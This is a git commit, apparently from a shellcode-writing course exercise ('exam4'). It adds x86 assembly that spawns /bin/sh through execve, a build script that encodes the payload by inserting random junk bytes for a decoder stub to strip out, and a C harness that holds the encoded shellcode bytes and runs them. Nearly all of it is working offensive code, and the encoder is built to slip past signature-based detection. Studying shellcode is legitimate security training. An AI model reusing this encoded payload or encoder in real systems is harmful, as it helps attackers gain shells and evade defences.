minor updates
This commit is contained in:
parent
24afc2aec6
commit
2e68426079
70
exam4/execve-stack.nasm
Normal file
70
exam4/execve-stack.nasm
Normal file
@ -0,0 +1,70 @@
|
|||||||
|
; This program is free software: you can redistribute it and/or modify
|
||||||
|
; it under the terms of the GNU General Public License as published by
|
||||||
|
; the Free Software Foundation, either version 3 of the License, or
|
||||||
|
; (at your option) any later version.
|
||||||
|
;
|
||||||
|
; This program is distributed in the hope that it will be useful,
|
||||||
|
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
; GNU General Public License for more details.
|
||||||
|
;
|
||||||
|
; You should have received a copy of the GNU General Public License
|
||||||
|
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
; Filename: execve-stack.nasm
|
||||||
|
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
||||||
|
; 2013 March
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
|
||||||
|
section .text
|
||||||
|
|
||||||
|
_start:
|
||||||
|
|
||||||
|
;
|
||||||
|
; =============================== EXECVE =====================================
|
||||||
|
;
|
||||||
|
; Now as we forwarded sockfd to a client, we can spawn shell.
|
||||||
|
; Prepare the path, in little-endian, using the Python
|
||||||
|
; >>> '//bin/sh'[::-1].encode('hex')
|
||||||
|
; '68732f6e69622f2f'
|
||||||
|
;
|
||||||
|
; int execve(const char *filename, char *const argv[], char *const envp[]);
|
||||||
|
; EAX EBX, ECX, EDX
|
||||||
|
; 11 '//bin/sh' PTR to EBX NULL
|
||||||
|
;
|
||||||
|
;
|
||||||
|
|
||||||
|
; EAX
|
||||||
|
xor eax, eax
|
||||||
|
mov al, 11 ; execve syscall
|
||||||
|
|
||||||
|
; EBX
|
||||||
|
xor edx, edx
|
||||||
|
push edx ; NULL termination of '//bin/sh' string
|
||||||
|
push 0x68732f6e ; '//bin/sh' in reverse
|
||||||
|
push 0x69622f2f ; beginning of '//bin/sh' string is here
|
||||||
|
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
|
||||||
|
|
||||||
|
; ECX
|
||||||
|
push edx ; NULL termination of a stack
|
||||||
|
push ebx ; load our '//bin/sh' on a stack
|
||||||
|
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
|
||||||
|
|
||||||
|
; EDX
|
||||||
|
push edx ; NULL terminator
|
||||||
|
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
|
||||||
|
; === EXIT(0) ===
|
||||||
|
; void _exit(int status);
|
||||||
|
; /usr/include/asm/unistd_32.h:#define __NR_exit 1
|
||||||
|
xor eax, eax ; EAX = 0x000000
|
||||||
|
mov al, 1 ; EAX = 0x000001 1: exit syscall
|
||||||
|
xor ebx, ebx ; EBX = 0x000000 0: success status
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
|
||||||
|
;section .data
|
66
exam4/make.sh
Executable file
66
exam4/make.sh
Executable file
@ -0,0 +1,66 @@
|
|||||||
|
#!/usr/bin/env sh
|
||||||
|
#
|
||||||
|
# This script will generate shellcode.c and compile it
|
||||||
|
#
|
||||||
|
|
||||||
|
#
|
||||||
|
# Compile the payload and decoder
|
||||||
|
#
|
||||||
|
echo " [+] Compiling the payload and decoder ..."
|
||||||
|
SPAYLOAD=./execve-stack
|
||||||
|
nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
|
||||||
|
SDECODER=./decoder
|
||||||
|
nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o
|
||||||
|
|
||||||
|
echo " [+] Preparing decoder shellcode ..."
|
||||||
|
DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)
|
||||||
|
|
||||||
|
#
|
||||||
|
# Encode the payload shellcode
|
||||||
|
#
|
||||||
|
echo " [+] Encoding the payload shellcode ..."
|
||||||
|
#
|
||||||
|
# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
|
||||||
|
# 00000000 37 aaa
|
||||||
|
# 00000001 FA cli
|
||||||
|
# 00000002 D6 salc
|
||||||
|
# 00000003 3F aas
|
||||||
|
#
|
||||||
|
|
||||||
|
garbage=('\x37' '\xFA' '\xD6' '\x3F');
|
||||||
|
ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"")
|
||||||
|
|
||||||
|
FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate shellcode.c
|
||||||
|
#
|
||||||
|
echo " [+] Generating shellcode.c file ..."
|
||||||
|
cat > shellcode.c << EOF
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
unsigned char code[] = \
|
||||||
|
$FULL_SHELLCODE;
|
||||||
|
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n", strlen(code));
|
||||||
|
int (*ret)() = (int(*)())code;
|
||||||
|
ret();
|
||||||
|
}
|
||||||
|
EOF
|
||||||
|
|
||||||
|
#
|
||||||
|
# Compile C code with GCC
|
||||||
|
#
|
||||||
|
echo " [+] Compiling shellcode.c with GCC ..."
|
||||||
|
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||||
|
|
||||||
|
ls -la ./shellcode
|
||||||
|
|
||||||
|
#
|
||||||
|
# Cleanup
|
||||||
|
#
|
||||||
|
rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o
|
||||||
|
|
BIN
exam4/shellcode
Executable file
BIN
exam4/shellcode
Executable file
Binary file not shown.
11
exam4/shellcode.c
Normal file
11
exam4/shellcode.c
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF";
|
||||||
|
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n", strlen(code));
|
||||||
|
int (*ret)() = (int(*)())code;
|
||||||
|
ret();
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user